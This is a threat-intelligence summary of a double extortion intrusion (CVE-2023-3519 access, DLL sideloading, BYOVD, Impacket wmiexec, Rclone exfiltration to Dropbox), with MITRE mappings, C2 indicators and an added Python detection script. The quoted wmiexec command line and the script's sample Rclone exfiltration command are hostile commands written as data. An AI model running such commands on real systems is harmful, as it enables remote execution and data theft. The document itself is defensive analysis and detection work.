Double Extortion Attack Analysis – ReliaQuest

ReliaQuest analyzed a September 2023 double extortion incident where data was encrypted and threats were made to publish stolen data. The threat actor used sophisticated TTPs—DLL sideloading, BYOVD to evade EDR, Impacket-based lateral movement, and Rclone-based exfiltration to Dropbox—to operate stealthily. #CobaltStrike #RedGuard #api.whitelrose.com #NetScalerCVE3519 #BYOVD #DLLSideLoading #Rclone #Dropbox

Keypoints

  • In early September 2023, ReliaQuest detected suspicious process executions within a customer’s environment originating from the Windows debug directory, later linked to a double extortion incident.
  • The actor used a digitally signed and vulnerable Palo Alto Cortex XDR binary for DLL sideloading, and employed a BYOVD approach to hinder EDR by unhooking security tools.
  • Initial access was traced to exploitation of the NetScaler AD vulnerability CVE-2023-3519, which also provided a path to AD credentials and domain traversal.
  • Lateral movement relied on Impacket’s wmiexec module to reach key devices, notably a domain controller, using a privileged service account.
  • DLL sideloading involved loading a malicious DLL (ntnativeapi.dll) alongside cyuserserver.exe, a signed Palo Alto Cortex XDR component, enabling execution under a legitimate process context.
  • C2 activity used a traditional in-memory beacon: cyuserserver.exe loaded the implant into dllhost.exe, which then connected to a Cobalt Strike team server (api.whitelrose.com; 45.77.120.140).
  • Exfiltration used Rclone, renamed to firefox.exe, to copy data to Dropbox (storagesite); the accompanying rclone.conf file was later deleted.

MITRE Techniques

  • [T1190] Exploit Public-Facing Application – Exploited a vulnerability in NetScaler AD CVE-2023-3519 to gain initial access. Quote: ‘exploiting a vulnerability in NetScaler AD CVE-2023-3519.’
  • [T1047] Windows Management Instrumentation – Used Impacket’s wmiexec module to move laterally to a domain controller. Quote: ‘the threat actor used Impacket’s wmiexec module to laterally move within the environment to target key devices—most notably, to a domain controller, [Domain-Controller01].’
  • [T1574.002] DLL Side-Loading – Ingressed ntnativeapi.dll alongside the signed cyuserserver.exe so that the malicious DLL was sideloaded. Quote: ‘an attacker ingressed a DLL, ntnativeapi.dll, and a binary, cyuserserver.exe, which, notably, was digitally signed by Palo Alto as a component of their Cortex XDR agent.’
  • [T1562.001] Impair Defenses – BYOVD used to unhook EDR and hinder defensive measures. Quote: ‘a BYOVD attack to hinder defensive measures by unhooking Endpoint Detection and Response (EDR)’.
  • [T1053.005] Scheduled Task – cyuserserver.exe was executed via a scheduled task. Quote: ‘Shortly after the cyuserserver.exe file was written to [Win-Server], it was executed via a scheduled task.’
  • [T1055] Process Injection – DLL-based payloads loaded into dllhost.exe, enabling memory-resident beacons. Quote: ‘dllhost.exe process being created, then injected into, and, ultimately, establishing a connection to a Cobalt Strike team server.’
  • [T1059.003] Windows Command Shell – cmd.exe used to run remote commands, with output redirected to a timestamped file on the ADMIN$ share (the wmiexec pattern). Quote: ‘cmd.exe /Q /c cd windows/debug 1> \\127.0.0.1\ADMIN$\__1693526401.246018 2>&1’
  • [T1567.002] Exfiltration to Cloud Storage – Exfiltrated data via Rclone to Dropbox. Quote: ‘The firefox.exe binary was seen resolving and connecting to dropboxapi[.]com, indicating that the threat actor used Dropbox for their remote storage system.’
  • [T1218] Signed Binary Proxy Execution – Leveraged a signed Cortex XDR component to run malicious DLL. Quote: ‘a binary, cyuserserver.exe, which, notably, was digitally signed by Palo Alto as a component of their Cortex XDR agent.’
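
As an added example (not part of the ReliaQuest report or this summary), the following Python sketches detection logic for four of the artefacts above, run over constructed process-creation records: the wmiexec output-redirection pattern, execution from the Windows debug directory, the signed cyuserserver.exe host loading ntnativeapi.dll from an untrusted path, and a renamed binary still pointing at an rclone.conf. The record field names, the sample paths and the remote name in the Rclone command are assumptions.

```python
import re

# Constructed process-creation records modelled on the artefacts in the summary
# (field names are an assumption; they mirror typical EDR telemetry).
WMIEXEC_RE = re.compile(
    r"cmd\.exe /Q /c .+ 1> \\\\127\.0\.0\.1\\ADMIN\$\\__\d+\.\d+ 2>&1", re.I)
SIGNED_HOSTS = {"cyuserserver.exe"}   # signed binaries seen hosting a sideloaded DLL
SIDELOAD_DLLS = {"ntnativeapi.dll"}
TRUSTED_DIRS = ("c:\\windows\\system32\\", "c:\\program files\\", "c:\\program files (x86)\\")

def basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def detect(event):
    """Return the detection names that fire on a single process event."""
    hits = []
    image, cmdline = event["image"].lower(), event.get("cmdline", "")
    # wmiexec redirects command output to a timestamped file on the ADMIN$ share
    if WMIEXEC_RE.search(cmdline):
        hits.append("wmiexec_remote_exec")
    # the actor staged its tooling in the Windows debug directory
    if image.startswith("c:\\windows\\debug\\"):
        hits.append("exec_from_windows_debug")
    # a signed host process loading the named DLL from outside trusted paths
    if basename(image) in SIGNED_HOSTS:
        for mod in event.get("modules", []):
            if basename(mod) in SIDELOAD_DLLS and not mod.lower().startswith(TRUSTED_DIRS):
                hits.append("dll_sideload_" + basename(mod))
    # Rclone renamed (here firefox.exe) but still given an rclone.conf
    if "rclone.conf" in cmdline.lower() and basename(image) != "rclone.exe":
        hits.append("renamed_rclone")
    return hits

def scan(events):
    """Map each alerting image path to its detections; silent events are dropped."""
    return {e["image"]: h for e in events if (h := detect(e))}

SAMPLE_EVENTS = [  # constructed samples, not telemetry from the report
    {"image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /Q /c cd windows/debug 1> \\127.0.0.1\ADMIN$\__1693526401.246018 2>&1"},
    {"image": r"C:\Windows\debug\cyuserserver.exe", "cmdline": "cyuserserver.exe",
     "modules": [r"C:\Windows\debug\ntnativeapi.dll", r"C:\Windows\System32\ntdll.dll"]},
    {"image": r"C:\Windows\debug\firefox.exe",
     "cmdline": r"firefox.exe copy D:\share storagesite:backup --config C:\Windows\debug\rclone.conf"},
    {"image": r"C:\Program Files\Mozilla Firefox\firefox.exe", "cmdline": "firefox.exe"},
]

if __name__ == "__main__":
    print(scan(SAMPLE_EVENTS))
```

The legitimate Firefox record produces no hit, which is the point of keying the Rclone rule on the config file rather than the process name.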

Indicators of Compromise

  • [IP Address] 45.77.120.140 – Cobalt Strike team server; resolved from api.whitelrose.com
  • [Domain] api.whitelrose.com – Cobalt Strike team server
  • [SHA256] d3eae40d08a9ed0306b142a9abad40b615201515af35581b7a0585e334ad43f4 – ntnativeapi.dll
  • [SHA256] f6b3cc9e3af99106ae3262ea360c0c51ea6c8341270fdae47bb5ea4655eb4853 – cyuserserver.exe
  • [SHA256] 966256acc79eb07799262c376a7333155675591d61e3315cc15b2d6dcccb3a00 – Renamed Rclone binary
  • [SHA256] 20398192fbef1924202a82fcd3459ef901999cebed02ead665c1f9a5087016a8 – Renamed IObitUnlocker.sys driver

Read more: https://www.reliaquest.com/blog/double-extortion-attack-analysis/